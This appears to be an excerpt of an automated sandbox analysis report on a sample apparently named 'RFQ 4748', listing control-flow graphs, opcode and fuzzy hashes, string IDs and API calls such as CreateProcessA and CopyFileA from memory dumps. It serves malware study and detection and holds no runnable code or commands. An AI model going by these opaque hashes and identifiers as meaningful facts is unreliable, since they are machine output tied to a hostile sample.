                                                              control_flow_graph 908 12d4161-12d4185 909 12d418b-12d41b6 908->909 910 12d4187-12d418a 908->910 913 12d4232-12d423a 909->913 910->909 914 12d41bd-12d41c0 913->914 915 12d41e0-12d41e5 914->915 916 12d41c7-12d41d0 915->916 917 12d41d9-12d41de 916->917 918 12d41d2 916->918 917->916 918->913 918->914 918->915 918->917 919 12d424e-12d4291 918->919 920 12d41e7-12d41ef 918->920 921 12d41c2-12d41c5 918->921 922 12d41fc-12d4202 918->922 923 12d421c-12d4222 918->923 924 12d423c-12d423e 918->924 925 12d41b8-12d41bb 918->925 926 12d42ba-12d42bf 918->926 927 12d4296-12d42b5 918->927 928 12d4212-12d421a 918->928 919->925 929 12d41f8-12d41fa 920->929 930 12d41f1 920->930 921->917 931 12d420b-12d4210 922->931 932 12d4204 922->932 933 12d422b-12d4230 923->933 934 12d4224 923->934 935 12d4244-12d4249 924->935 936 12d42c1 924->936 925->928 937 12d42c3-12d42c5 926->937 927->925 928->921 929->916 930->913 930->914 930->919 930->922 930->923 930->924 930->925 930->926 930->927 930->928 930->929 931->921 932->913 932->919 932->923 932->924 932->925 932->926 932->927 932->931 933->914 934->919 934->924 934->926 934->927 934->933 935->925 936->937 939 12d42c7-12d42df 937->939 940 12d42e1-12d4338 937->940 939->940 955 12d433a-12d4340 940->955 956 12d4350-12d4375 940->956 957 12d4344-12d4346 955->957 958 12d4342 955->958 961 12d437d-12d43c7 956->961 957->956 958->956 966 12d43df-12d43e6 961->966 967 12d43c9-12d43cf 961->967 968 12d43d1 967->968 969 12d43d3-12d43d5 967->969 968->966 969->966
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d%cq$d%cq$$]q$$]q
                                                              • API String ID: 0-2396156113
                                                              • Opcode ID: 2370f42fe1e4d85b230802b4fcb0cc9c0955ac0f25c90b860f2efe2dc64be17e
                                                              • Instruction ID: 588830c71cc8862b64ddf13ef2fd9f5fb81778b5598dae32f54602429715e122
                                                              • Opcode Fuzzy Hash: 2370f42fe1e4d85b230802b4fcb0cc9c0955ac0f25c90b860f2efe2dc64be17e
                                                              • Instruction Fuzzy Hash: 49616B30B103468FC708AB3DDC95B6A7AEABF85710F254A69D502DB7D8DB74DC018791
                                                              Function 012D4561 Relevance: 5.0, Strings: 4, Instructions: 7COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 970 12d4561-12d45f9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq$jjjjjj$$]q$$]q
                                                              • API String ID: 0-2713803779
                                                              • Opcode ID: cf7fab160be1ceb3904721f8ff163ff7c1ea1a75c2a4c50b6bdc5c24253daf15
                                                              • Instruction ID: 4a99b0f66df49ea2836315c50a0329d857868c80aa7f7fbc0194fdaa1c047181
                                                              • Opcode Fuzzy Hash: cf7fab160be1ceb3904721f8ff163ff7c1ea1a75c2a4c50b6bdc5c24253daf15
                                                              • Instruction Fuzzy Hash: CEB092A281E3C4CFC7025E9888E20607F60AA7204035EC1E6C8994E987E1658A86E362
                                                              Function 06AEF5F7 Relevance: 4.2, Strings: 3, Instructions: 465COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 972 6aef5f7-6aef630 974 6aef67e-6aef68c 972->974 975 6aef632-6aef679 972->975 976 6aef68e-6aef699 974->976 977 6aef69b 974->977 1018 6aefad5-6aefadc 975->1018 978 6aef69d-6aef6a4 976->978 977->978 981 6aef78d-6aef791 978->981 982 6aef6aa-6aef6ae 978->982 983 6aef7e7-6aef7f1 981->983 984 6aef793-6aef7a2 981->984 985 6aefadd-6aefb05 982->985 986 6aef6b4-6aef6b8 982->986 990 6aef82a-6aef850 983->990 991 6aef7f3-6aef802 983->991 996 6aef7a6-6aef7ab 984->996 994 6aefb0c-6aefb36 985->994 988 6aef6ca-6aef728 986->988 989 6aef6ba-6aef6c4 986->989 1027 6aef72e-6aef788 988->1027 1028 6aefb9b-6aefbc5 988->1028 989->988 989->994 1014 6aef85d 990->1014 1015 6aef852-6aef85b 990->1015 1000 6aefb3e-6aefb54 991->1000 1001 6aef808-6aef825 991->1001 994->1000 1002 6aef7ad-6aef7e2 call 6aef4d8 996->1002 1003 6aef7a4 996->1003 1029 6aefb5c-6aefb94 1000->1029 1001->1018 1002->1018 1003->996 1020 6aef85f-6aef887 1014->1020 1015->1020 1032 6aef88d-6aef8a6 1020->1032 1033 6aef958-6aef95c 1020->1033 1027->1018 1044 6aefbcf-6aefbd5 1028->1044 1045 6aefbc7-6aefbcd 1028->1045 1029->1028 1032->1033 1057 6aef8ac-6aef8bb 1032->1057 1038 6aef95e-6aef977 1033->1038 1039 6aef9d6-6aef9e0 1033->1039 1038->1039 1062 6aef979-6aef988 1038->1062 1041 6aefa3d-6aefa46 1039->1041 1042 6aef9e2-6aef9ec 1039->1042 1048 6aefa7e-6aefacb 1041->1048 1049 6aefa48-6aefa76 1041->1049 1058 6aef9ee-6aef9f0 1042->1058 1059 6aef9f2-6aefa04 1042->1059 1045->1044 1050 6aefbd6-6aefc13 1045->1050 1066 6aefad3 1048->1066 1049->1048 1074 6aef8bd-6aef8c3 1057->1074 1075 6aef8d3-6aef8e8 1057->1075 1064 6aefa06-6aefa08 1058->1064 1059->1064 1080 6aef98a-6aef990 1062->1080 1081 6aef9a0-6aef9ab 1062->1081 1070 6aefa0a-6aefa0e 1064->1070 1071 6aefa36-6aefa3b 1064->1071 1066->1018 1076 6aefa2c-6aefa2f 1070->1076 1077 6aefa10-6aefa29 1070->1077 1071->1041 1071->1042 1082 6aef8c7-6aef8c9 1074->1082 1083 6aef8c5 1074->1083 1086 6aef91c-6aef925 1075->1086 1087 6aef8ea-6aef916 1075->1087 1076->1071 1077->1076 1090 6aef994-6aef996 1080->1090 1091 6aef992 1080->1091 1081->1028 1092 6aef9b1-6aef9d4 1081->1092 1082->1075 1083->1075 1086->1028 1089 6aef92b-6aef952 1086->1089 1087->1029 1087->1086 1089->1033 1089->1057 1090->1081 1091->1081 1092->1039 1092->1062
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq$Haq$Haq
                                                              • API String ID: 0-3013282719
                                                              • Opcode ID: b6833f90e9e290a29cd0cd7f833b2f9a5d22d45ad9aec90bce522dc91aa2888b
                                                              • Instruction ID: 01c90eb22b32d499a31a0c45b9624b819c8f5f5c821ebdcf8129248f6143c76a
                                                              • Opcode Fuzzy Hash: b6833f90e9e290a29cd0cd7f833b2f9a5d22d45ad9aec90bce522dc91aa2888b
                                                              • Instruction Fuzzy Hash: 9A027D30A002059FCB65EFA5D894AAEBBF6FF88300F108529D5469B394DB35EC46CB90
                                                              Function 06AA1018 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1104 6aa1018-6aa1055 1106 6aa1077-6aa108d call 6aa0e20 1104->1106 1107 6aa1057-6aa105a 1104->1107 1113 6aa1403-6aa1417 1106->1113 1114 6aa1093-6aa109f 1106->1114 1219 6aa105c call 6aa1988 1107->1219 1220 6aa105c call 6aa1930 1107->1220 1109 6aa1062-6aa1064 1109->1106 1111 6aa1066-6aa106e 1109->1111 1111->1106 1124 6aa1457-6aa1460 1113->1124 1115 6aa11d0-6aa11d7 1114->1115 1116 6aa10a5-6aa10a8 1114->1116 1118 6aa11dd-6aa11e6 1115->1118 1119 6aa1306-6aa1343 call 6aa0828 call 6aa37d0 1115->1119 1117 6aa10ab-6aa10b4 1116->1117 1121 6aa10ba-6aa10ce 1117->1121 1122 6aa14f8 1117->1122 1118->1119 1123 6aa11ec-6aa12f8 call 6aa0828 call 6aa0db8 call 6aa0828 1118->1123 1163 6aa1349-6aa13fa call 6aa0828 1119->1163 1138 6aa11c0-6aa11ca 1121->1138 1139 6aa10d4-6aa1169 call 6aa0e20 * 2 call 6aa0828 call 6aa0db8 call 6aa0e60 call 6aa0f08 call 6aa0f70 1121->1139 1128 6aa14fd-6aa1501 1122->1128 1215 6aa12fa 1123->1215 1216 6aa1303-6aa1304 1123->1216 1126 6aa1462-6aa1469 1124->1126 1127 6aa1425-6aa142e 1124->1127 1135 6aa146b-6aa14ae call 6aa0828 1126->1135 1136 6aa14b7-6aa14be 1126->1136 1127->1122 1130 6aa1434-6aa1446 1127->1130 1131 6aa150c 1128->1131 1132 6aa1503 1128->1132 1149 6aa1448-6aa144d 1130->1149 1150 6aa1456 1130->1150 1145 6aa150d 1131->1145 1132->1131 1135->1136 1140 6aa14e3-6aa14f6 1136->1140 1141 6aa14c0-6aa14d0 1136->1141 1138->1115 1138->1117 1196 6aa116b-6aa1183 call 6aa0f08 call 6aa0828 call 6aa0ad8 1139->1196 1197 6aa1188-6aa11bb call 6aa0f70 1139->1197 1140->1128 1141->1140 1155 6aa14d2-6aa14da 1141->1155 1145->1145 1221 6aa1450 call 6aa3f62 1149->1221 1222 6aa1450 call 6aa3f70 1149->1222 1150->1124 1155->1140 1163->1113 1196->1197 1197->1138 1215->1216 1216->1119 1219->1109 1220->1109 1221->1150 1222->1150
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$4']q$4']q
                                                              • API String ID: 0-705557208
                                                              • Opcode ID: 47b669215e96b057c1a853b687d912e5293f60f5cd53527799b88c25332a93c9
                                                              • Instruction ID: 904e81314b05b173f881e7172c0d37b3fb722fef515b475895a04dafb9e00c57
                                                              • Opcode Fuzzy Hash: 47b669215e96b057c1a853b687d912e5293f60f5cd53527799b88c25332a93c9
                                                              • Instruction Fuzzy Hash: 48F1DD34A10218DFCB44EFA4D998A9DB7B2FF89305F118159E505AB3A5DB71EC42CF90
                                                              Function 06AA5600 Relevance: 4.1, Strings: 3, Instructions: 361COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1223 6aa5600-6aa5610 1224 6aa5729-6aa574e 1223->1224 1225 6aa5616-6aa561a 1223->1225 1227 6aa5755-6aa577a 1224->1227 1226 6aa5620-6aa5629 1225->1226 1225->1227 1228 6aa562f-6aa5656 1226->1228 1229 6aa5781-6aa57b7 1226->1229 1227->1229 1240 6aa571e-6aa5728 1228->1240 1241 6aa565c-6aa565e 1228->1241 1246 6aa57be-6aa5814 1229->1246 1242 6aa567f-6aa5681 1241->1242 1243 6aa5660-6aa5663 1241->1243 1247 6aa5684-6aa5688 1242->1247 1245 6aa5669-6aa5673 1243->1245 1243->1246 1245->1246 1250 6aa5679-6aa567d 1245->1250 1261 6aa5838-6aa584f 1246->1261 1262 6aa5816-6aa582d call 6aa5d18 1246->1262 1248 6aa568a-6aa5699 1247->1248 1249 6aa56e9-6aa56f5 1247->1249 1248->1246 1257 6aa569f-6aa56e6 1248->1257 1249->1246 1253 6aa56fb-6aa5718 1249->1253 1250->1242 1250->1247 1253->1240 1253->1241 1257->1249 1269 6aa5940-6aa5950 1261->1269 1270 6aa5855-6aa593b call 6aa0e20 call 6aa0828 * 2 call 6aa0e60 call 6aa4638 call 6aa0828 call 6aa37d0 call 6aa16c8 1261->1270 1267 6aa5833 1262->1267 1271 6aa5a63-6aa5a6e 1267->1271 1279 6aa5a3e-6aa5a5a call 6aa0828 1269->1279 1280 6aa5956-6aa5a30 call 6aa0e20 * 2 call 6aa15d8 call 6aa0828 * 2 call 6aa0ad8 call 6aa0f70 call 6aa0828 1269->1280 1270->1269 1281 6aa5a9d-6aa5abe call 6aa0f70 1271->1281 1282 6aa5a70-6aa5a80 1271->1282 1279->1271 1333 6aa5a3b 1280->1333 1334 6aa5a32 1280->1334 1291 6aa5a82-6aa5a88 1282->1291 1292 6aa5a90-6aa5a98 call 6aa16c8 1282->1292 1291->1292 1292->1281 1333->1279 1334->1333
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (aq$(aq$Haq
                                                              • API String ID: 0-2456560092
                                                              • Opcode ID: 03da4793046a114edbab0376efdece5505780a5e0a51ebf4aa424332b2ae7dab
                                                              • Instruction ID: df760d5a7207d285cf054fd78f0789520701b300990da545d8e04f07b2600cbe
                                                              • Opcode Fuzzy Hash: 03da4793046a114edbab0376efdece5505780a5e0a51ebf4aa424332b2ae7dab
                                                              • Instruction Fuzzy Hash: 7DE15234A01209DFCB44EF64D5949AEBBB6FF89300F118569E816AB365DF30EC42CB95
                                                              Function 06A51E48 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2104924846.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6a50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$4']q
                                                              • API String ID: 0-3120983240
                                                              • Opcode ID: 4b708d1eed240f8d8263791f718fc366e2fb6ea37dc3f34a4d4b7d8fd415f657
                                                              • Instruction ID: b8ea7e6dad453d97619a2d1732a291e85acd697edb37453cc0906c4b28919752
                                                              • Opcode Fuzzy Hash: 4b708d1eed240f8d8263791f718fc366e2fb6ea37dc3f34a4d4b7d8fd415f657
                                                              • Instruction Fuzzy Hash: 4E42B274E0020ACFDB94EB94D998ABEB7B6FF89311F11842AD9126B354C7345E46CF90
                                                              Function 06A52970 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2247 6a52970-6a52998 2248 6a5299f-6a529c8 2247->2248 2249 6a5299a 2247->2249 2250 6a529e9 2248->2250 2251 6a529ca-6a529d3 2248->2251 2249->2248 2254 6a529ec-6a529f0 2250->2254 2252 6a529d5-6a529d8 2251->2252 2253 6a529da-6a529dd 2251->2253 2255 6a529e7 2252->2255 2253->2255 2256 6a52da7-6a52dbe 2254->2256 2255->2254 2258 6a529f5-6a529f9 2256->2258 2259 6a52dc4-6a52dc8 2256->2259 2262 6a529fe-6a52a02 2258->2262 2263 6a529fb-6a52a58 2258->2263 2260 6a52dfd-6a52e01 2259->2260 2261 6a52dca-6a52dfa 2259->2261 2267 6a52e03-6a52e0c 2260->2267 2268 6a52e22 2260->2268 2261->2260 2265 6a52a04-6a52a28 2262->2265 2266 6a52a2b-6a52a2e 2262->2266 2271 6a52a5d-6a52a61 2263->2271 2272 6a52a5a-6a52acb 2263->2272 2265->2266 2275 6a52a36-6a52a4f 2266->2275 2273 6a52e13-6a52e16 2267->2273 2274 6a52e0e-6a52e11 2267->2274 2269 6a52e25-6a52e2b 2268->2269 2277 6a52a63-6a52a87 2271->2277 2278 6a52a8a-6a52ab1 2271->2278 2282 6a52ad0-6a52ad4 2272->2282 2283 6a52acd-6a52b2a 2272->2283 2280 6a52e20 2273->2280 2274->2280 2275->2256 2277->2278 2302 6a52ac1-6a52ac2 2278->2302 2303 6a52ab3-6a52ab9 2278->2303 2280->2269 2288 6a52ad6-6a52afa 2282->2288 2289 6a52afd-6a52b21 2282->2289 2291 6a52b2c-6a52b88 2283->2291 2292 6a52b2f-6a52b33 2283->2292 2288->2289 2289->2256 2304 6a52b8d-6a52b91 2291->2304 2305 6a52b8a-6a52bec 2291->2305 2298 6a52b35-6a52b59 2292->2298 2299 6a52b5c-6a52b7f 2292->2299 2298->2299 2299->2256 2302->2256 2303->2302 2311 6a52b93-6a52bb7 2304->2311 2312 6a52bba-6a52bbd 2304->2312 2314 6a52bf1-6a52bf5 2305->2314 2315 6a52bee-6a52c50 2305->2315 2311->2312 2372 6a52bbf call 6aaa768 2312->2372 2373 6a52bbf call 6aaa758 2312->2373 2321 6a52bf7-6a52c1b 2314->2321 2322 6a52c1e-6a52c36 2314->2322 2326 6a52c55-6a52c59 2315->2326 2327 6a52c52-6a52cb4 2315->2327 2318 6a52bc5-6a52bd2 2324 6a52bd4-6a52bda 2318->2324 2325 6a52be2-6a52be3 2318->2325 2321->2322 2335 6a52c46-6a52c47 2322->2335 2336 6a52c38-6a52c3e 2322->2336 2324->2325 2325->2256 2331 6a52c82-6a52c9a 2326->2331 2332 6a52c5b-6a52c7f 2326->2332 2337 6a52cb6-6a52d18 2327->2337 2338 6a52cb9-6a52cbd 2327->2338 2346 6a52c9c-6a52ca2 2331->2346 2347 6a52caa-6a52cab 2331->2347 2332->2331 2335->2256 2336->2335 2348 6a52d1d-6a52d21 2337->2348 2349 6a52d1a-6a52d73 2337->2349 2342 6a52ce6-6a52cfe 2338->2342 2343 6a52cbf-6a52ce3 2338->2343 2357 6a52d00-6a52d06 2342->2357 2358 6a52d0e-6a52d0f 2342->2358 2343->2342 2346->2347 2347->2256 2353 6a52d23-6a52d47 2348->2353 2354 6a52d4a-6a52d6d 2348->2354 2359 6a52d75-6a52d99 2349->2359 2360 6a52d9c-6a52d9f 2349->2360 2353->2354 2354->2256 2357->2358 2358->2256 2359->2360 2360->2256 2372->2318 2373->2318
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2104924846.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6a50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$4']q
                                                              • API String ID: 0-3120983240
                                                              • Opcode ID: 5a30a69c565876bf6a21e1b47bf8ff8fd9ff36ced94fcad57be4404297afb76c
                                                              • Instruction ID: 05025160caea83086ab809ff54b104d80cac0a8e2591daa597bad73490ada12b
                                                              • Opcode Fuzzy Hash: 5a30a69c565876bf6a21e1b47bf8ff8fd9ff36ced94fcad57be4404297afb76c
                                                              • Instruction Fuzzy Hash: FCF1D334D11209DFDBA4EFA4E5986ACBBB6FF89311F21412AE906AB350DB315985CF40
                                                              Function 06C5E4B0 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2489 6c5e4b0-6c5e4d2 2490 6c5e5c6-6c5e5eb 2489->2490 2491 6c5e4d8-6c5e4da 2489->2491 2493 6c5e5f2-6c5e616 2490->2493 2492 6c5e4e0-6c5e4ec 2491->2492 2491->2493 2498 6c5e500-6c5e510 2492->2498 2499 6c5e4ee-6c5e4fa 2492->2499 2505 6c5e61d-6c5e641 2493->2505 2498->2505 2506 6c5e516-6c5e524 2498->2506 2499->2498 2499->2505 2509 6c5e648-6c5e6cd call 6c5b918 2505->2509 2506->2509 2510 6c5e52a-6c5e52f 2506->2510 2536 6c5e6d2-6c5e6e0 call 6c5d7c0 2509->2536 2544 6c5e531 call 6c5e6c0 2510->2544 2545 6c5e531 call 6c5e4b0 2510->2545 2512 6c5e537-6c5e580 2527 6c5e5a3-6c5e5c3 call 6c5c5c0 2512->2527 2528 6c5e582-6c5e59b 2512->2528 2528->2527 2540 6c5e6e2-6c5e6e8 2536->2540 2541 6c5e6f8-6c5e6fa 2536->2541 2542 6c5e6ec-6c5e6ee 2540->2542 2543 6c5e6ea 2540->2543 2542->2541 2543->2541 2544->2512 2545->2512
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (aq$Haq
                                                              • API String ID: 0-3785302501
                                                              • Opcode ID: 0ed53544b012eafa4e8281adc336401c86c809b47f9c2106b2350ef36daa0240
                                                              • Instruction ID: 2fc3c612af340731f820d24462d1af83f241b379858df0f6cb4a26df761e55cc
                                                              • Opcode Fuzzy Hash: 0ed53544b012eafa4e8281adc336401c86c809b47f9c2106b2350ef36daa0240
                                                              • Instruction Fuzzy Hash: A7519D30B002158FD799AF39D898A6EBBAAEF99301B11446CD9068B390DF35DD42CB95
                                                              Function 0585812E Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: /$?
                                                              • API String ID: 0-2346587220
                                                              • Opcode ID: 3f630b3196853aad9b554b43fcf9f444649eed4639b516dbc3a8b35bf84afb20
                                                              • Instruction ID: d3916d5699e6f402cf56bfec5c484db0db52191539fee96911d9534c7eeaac75
                                                              • Opcode Fuzzy Hash: 3f630b3196853aad9b554b43fcf9f444649eed4639b516dbc3a8b35bf84afb20
                                                              • Instruction Fuzzy Hash: 2141CE7490522CCFDB64DF24D898BE8BBB2BB09344F1095EAD90AB7280CB345E85CF51
                                                              Function 0585870E Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $E
                                                              • API String ID: 0-810732363
                                                              • Opcode ID: 76c16dc08fc988ba2d730fd95eae0b5c6181e756236347d7d2a86a7cafd943cd
                                                              • Instruction ID: 278ce7293101604d66adfac59c120ff194de60f135b9093c062555d02ac6f7fa
                                                              • Opcode Fuzzy Hash: 76c16dc08fc988ba2d730fd95eae0b5c6181e756236347d7d2a86a7cafd943cd
                                                              • Instruction Fuzzy Hash: D541DF74905229CFDBA0DF64D988BE9BBB2FB49314F1085EAD809B7240DB359E85CF10
                                                              Function 05858E87 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2103250563.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5850000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,$6
                                                              • API String ID: 0-4030993065
                                                              • Opcode ID: bea1535c2d8bd085493d2134658c9eef7393c5eb2de5b4d3d6f14bcf7fd13bce
                                                              • Instruction ID: 5030174e994936bb0d5aa2cbb27c140b149a3651823293a044cfaf8352c7b83f
                                                              • Opcode Fuzzy Hash: bea1535c2d8bd085493d2134658c9eef7393c5eb2de5b4d3d6f14bcf7fd13bce
                                                              • Instruction Fuzzy Hash: 5531BF74906228CFDB64CF65D948BE8BBB2FB05394F5095EAD909B3280C7395E89CF14
                                                              Function 06AA1EF8 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,aq
                                                              • API String ID: 0-3092978723
                                                              • Opcode ID: b692d658dfc8c8f6b305438b716294c7ead41d5b125986ff6cd26dc0a4e39fed
                                                              • Instruction ID: 8882854ba5363f122bb7ce11d60a07185a7a99450d342dcf9ed078066b7de930
                                                              • Opcode Fuzzy Hash: b692d658dfc8c8f6b305438b716294c7ead41d5b125986ff6cd26dc0a4e39fed
                                                              • Instruction Fuzzy Hash: 49522975A002288FDB64DF68C994BDDBBF6BF88300F1541D9E549AB361DA309E81CF61
                                                              Function 012DE3A0 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (_]q
                                                              • API String ID: 0-188044275
                                                              • Opcode ID: 53ff62b477745a88cc4d56d157359cc68c241353df0da2df55f27f6ae400cfee
                                                              • Instruction ID: 32476e326e06dac3ede056acb6c6aa0ab9a7acd33572098a9b1d535d36c4c417
                                                              • Opcode Fuzzy Hash: 53ff62b477745a88cc4d56d157359cc68c241353df0da2df55f27f6ae400cfee
                                                              • Instruction Fuzzy Hash: C6227C35A102059FDB14DFA9D494AADBBB2BF88300F158569EA45EF3A1CB71EC41CB90
                                                              Function 06AD91E4 Relevance: 1.7, APIs: 1, Instructions: 214processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06AD93CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 1ffa34a41ad110e32827da52f005373312a59849f2679aae213868e29aeb296e
                                                              • Instruction ID: f6892c04f693cac6bf9725f8a4e6600328866f3e1cf77bae9f5e58bfb4689f7a
                                                              • Opcode Fuzzy Hash: 1ffa34a41ad110e32827da52f005373312a59849f2679aae213868e29aeb296e
                                                              • Instruction Fuzzy Hash: DC8138B1D002599FDB50EFA9C8817EEBBF5BF48314F148529E85AAB280D7749881CB91
                                                              Function 06AD91F0 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06AD93CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 78f8ef5bd5d8fb15c0115ac414c7692f15c90e7c99c4a081977303e7970ffd9a
                                                              • Instruction ID: cc62c2c2e88709015712a52261f70b709c41d0db53a93a68750307e303f6b722
                                                              • Opcode Fuzzy Hash: 78f8ef5bd5d8fb15c0115ac414c7692f15c90e7c99c4a081977303e7970ffd9a
                                                              • Instruction Fuzzy Hash: 3B8128B1D002599FDB50EFA9C8817EEBBF1BF48314F148529E85AAB284D774D881CB81
                                                              Function 06ADB094 Relevance: 1.6, APIs: 1, Instructions: 147fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CopyFileA.KERNEL32(?,?,?), ref: 06ADB1E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID:
                                                              • API String ID: 1304948518-0
                                                              • Opcode ID: 37d149193fc22ff286cd5fc9b973c78f7d2a126458ea7efcf9990c4b9f25e02b
                                                              • Instruction ID: 8819ca776220de30a40a8b69d1718ac1c3b3aa229589aeba525f060dac916f70
                                                              • Opcode Fuzzy Hash: 37d149193fc22ff286cd5fc9b973c78f7d2a126458ea7efcf9990c4b9f25e02b
                                                              • Instruction Fuzzy Hash: D6518CB1D002599FDB50EFA9C8857EEBBF2FF48314F158529E816AB280D7749841CBA1
